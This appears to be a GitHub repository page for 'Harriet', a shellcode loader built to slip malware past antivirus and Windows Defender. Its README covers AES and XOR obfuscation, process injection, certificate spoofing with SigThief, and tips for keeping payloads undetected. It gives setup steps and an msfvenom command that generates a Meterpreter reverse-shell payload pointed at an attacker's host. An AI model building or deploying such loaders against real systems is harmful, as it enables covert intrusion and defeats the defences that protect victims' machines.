Skip to content

Latest commit

 

History

History
 
 

Harriet

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
Harriet
Harriet
 
 
DLL.sh
DLL.sh
 
 
EXE.sh
EXE.sh
 
 
Harriet.sh
Harriet.sh
 
 
README.md
README.md
 
 
setup.sh
setup.sh
 
 

README.md

Screen Shot 2022-10-02 at 10 29 43 AM

Meet Harriet!

Harriet was inspired by the Charlotte C++ shellcode loader. This tool uses AES encryption and function/variable obfuscation to get around AV and Windows Defender. Most of the code was taken from the Sektor 7 Malware Development Essentials course. All credit goes to reenz0h and @Sektor7net. I wrote this mainly as a way to get a quick undetected executable for testing and to not have to switch over to a Windows VM every five seconds for compiling.

Screen Shot 2022-10-17 at 12 14 33 PM

The payload framework is very effective when paired with my Covenant Randomizer script.

Screen Shot 2022-10-17 at 12 15 10 PM

I was able to bypass Defender with Covenant with no problems.

Screen Shot 2022-10-17 at 11 59 31 AM

I was also able to bypass Defender with a Meterpreter payload. This might not be as effective since Meterpreter is signatured so heavily. Your results will vary without modifying your Meterpreter payload's template inside Metasploit. Going with lesser used payloads will probably yield good results.

Modules

Screen Shot 2022-10-17 at 12 12 15 PM

There are four modules currently. As of this post, all of them bypass AV/Defender.

AES Encrypted payload

AES Encrypted payload with process injection

QueueUserAPC shellcode execution

ThreadPoolWait shellcode execution.

All of the modules use XOR encryption for strings and function obfuscation and AES encryption for payload exection. Once the payload is compiled, the script uses SigThief to sign the binary with a Microsoft certificate.

Usage:

Clone The Repo

git clone https://github.com/assume-breach/Home-Grown-Red-Team.git

Run The Setup Script

cd Home-Grown-Red-Team/Harriet/ bash setup.sh The setup script will give you the self-signed cert you need for executable signing.

Create Your Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=IP lport=PORT -f raw > msfr.bin

Run the Script

**bash Harriet.sh **

Fill In The Values As Prompted

Mitigations

There are a few issues that you should be aware of. The first is that this will be detected at some point. Eventually, it will wind up on VT or the AV engines will signature it. There are mitigations that you can take to customize it. The first is to change the Virt_Alloc variable in all of the scripts. The second is to change all of the values in the randomization scripts. Adding various sleep functions within the scripts can also keep the script from being signatured. The binary that Harriet uses to sign your malware is a Microsoft Office 365 updater. You can switch this out with a different binary and replace the path for your new exe in the scripts. This can help with keeping your malware undetected.

Enjoy and DON'T UPLOAD TO Virus Total!!!!!